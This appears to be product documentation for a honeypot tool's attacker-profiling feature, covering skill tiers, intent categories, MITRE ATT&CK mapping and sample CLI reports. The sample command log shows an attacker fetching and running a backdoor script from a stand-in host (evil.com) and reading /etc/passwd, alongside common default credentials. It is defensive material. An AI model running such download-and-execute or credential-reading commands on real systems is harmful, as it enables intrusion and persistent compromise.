Skip to main content
Panguard Trap does not just log connections — it builds behavioral profiles of every attacker that interacts with your honeypots. Each profile includes a skill level classification, intent analysis, and mapping to MITRE ATT&CK techniques.

Skill Level Classification

Trap classifies attackers into three tiers based on observed behavior:

Script Kiddie

IndicatorExample
Uses publicly available tools without modificationRunning Hydra with default wordlists
Tries only default credentialsadmin/admin, root/password, root/123456
No post-exploitation activityDisconnects after successful login
High volume, low sophisticationHundreds of login attempts with common passwords

Advanced

IndicatorExample
Modifies tool parametersCustom wordlists, adjusted scan timing
Attempts multiple exploit typesTries SSH, then HTTP, then MySQL
Basic post-exploitationRuns uname -a, cat /etc/passwd, checks for other hosts
Internal network scanningProbes RFC 1918 addresses after gaining access

APT (Advanced Persistent Threat)

IndicatorExample
Custom payloadsNon-standard exploit code, compiled binaries
Low and slow approachFew connections over extended time periods
Persistence establishmentInstalls cron jobs, modifies SSH keys, plants backdoors
Targeted behaviorSearches for specific files, databases, or configurations
Anti-forensicsClears logs, modifies timestamps

Classification Signals

  • Default credentials (admin/admin, root/root): Script Kiddie
  • Credential lists (sequential attempts from known wordlists): Script Kiddie to Advanced
  • Targeted credentials (organization-specific usernames, previously breached passwords): Advanced to APT
  • Single commands (whoami, id, uname -a): Script Kiddie
  • Chained commands (enumeration scripts, privilege escalation attempts): Advanced
  • Custom tooling (obfuscated scripts, memory-resident payloads, anti-detection): APT
  • Fast and noisy (rapid connection attempts, no pauses): Script Kiddie
  • Moderate pacing (delays between attempts, some adaptation): Advanced
  • Slow and deliberate (long dwell time, careful enumeration, anti-forensics): APT

Intent Analysis

Trap analyzes behavioral patterns to classify attacker intent into 6 categories:
IntentIndicatorsMITRE Tactic
ReconnaissancePort scanning, service enumeration, OS fingerprintingTA0043
Brute ForceHigh-volume credential attempts, dictionary attacksTA0006
ExploitationKnown CVE payloads, buffer overflow attempts, injection attacksTA0001
Lateral MovementInternal network scanning, SMB enumeration, SSH pivotingTA0008
Data ExfiltrationFile download commands, data encoding, outbound transfersTA0010
PersistenceCron job creation, SSH key modification, backdoor installationTA0003

MITRE ATT&CK Mapping

Every attacker action is mapped to the relevant MITRE ATT&CK technique:
Observed BehaviorTechnique IDTechnique Name
SSH password guessingT1110.001Password Guessing
Credential stuffingT1110.004Credential Stuffing
Web shell uploadT1505.003Web Shell
cat /etc/passwdT1087.001Local Account Discovery
Internal port scanT1046Network Service Scanning
Cron job creationT1053.003Cron
SSH key modificationT1098.004SSH Authorized Keys
wget/curl downloadT1105Ingress Tool Transfer

Profile Report

View attacker profiles via the CLI: 
panguard trap profiles

── Attacker Profiles ──────────────────

Attacker #1: 203.0.113.50
  Level:     Script Kiddie
  Intent:    Brute Force
  Sessions:  47
  Duration:  2h 15m
  Creds:     admin/admin, root/123456 (12 attempts)
  Tools:     hydra 9.4
  MITRE:     T1110.001 (Password Guessing)

Attacker #2: 198.51.100.23
  Level:     Advanced
  Intent:    Reconnaissance -> Exploitation
  Sessions:  3
  Duration:  45m
  Commands:  uname -a, cat /etc/passwd, wget http://...
  Tools:     Custom scripts
  MITRE:     T1046, T1087.001, T1105

Collected Intelligence

Credential Database

All attempted username/password combinations are recorded: 
── Captured Credentials ───────────────

SSH:
  root / password       (847 attempts)
  admin / admin         (234 attempts)
  root / 123456         (156 attempts)
  ubuntu / ubuntu       (89 attempts)

Command Logs

Every command executed in a honeypot session is logged with timestamps: 
── Command Log ────────────────────────

Session: 203.0.113.50 @ 2025-01-15 14:23
  $ uname -a
  $ cat /etc/passwd
  $ wget http://evil.com/backdoor.sh
  $ chmod +x backdoor.sh
  $ ./backdoor.sh

Intelligence Flow

Honeypot Session
      |
      v
Behavioral Analysis ──> Skill Classification
      |                        |
      v                        v
Intent Classification    MITRE Mapping
      |                        |
      v                        v
Guard Block List    Threat Cloud Upload

Threat Cloud Integration

Attacker profiles are anonymized before sharing:
Data SharedAnonymization
Source IP/16 masked (last two octets zeroed)
CredentialsHashed (SHA-256), never plaintext
CommandsSanitized of environment-specific data
Skill classificationShared as-is
Intent analysisShared as-is
Attacker profiles persist across sessions. If the same IP returns days later, Trap correlates the new activity with the existing profile and may upgrade the skill level classification based on new evidence. Threat Cloud sharing can be disabled with --no-cloud for air-gapped environments.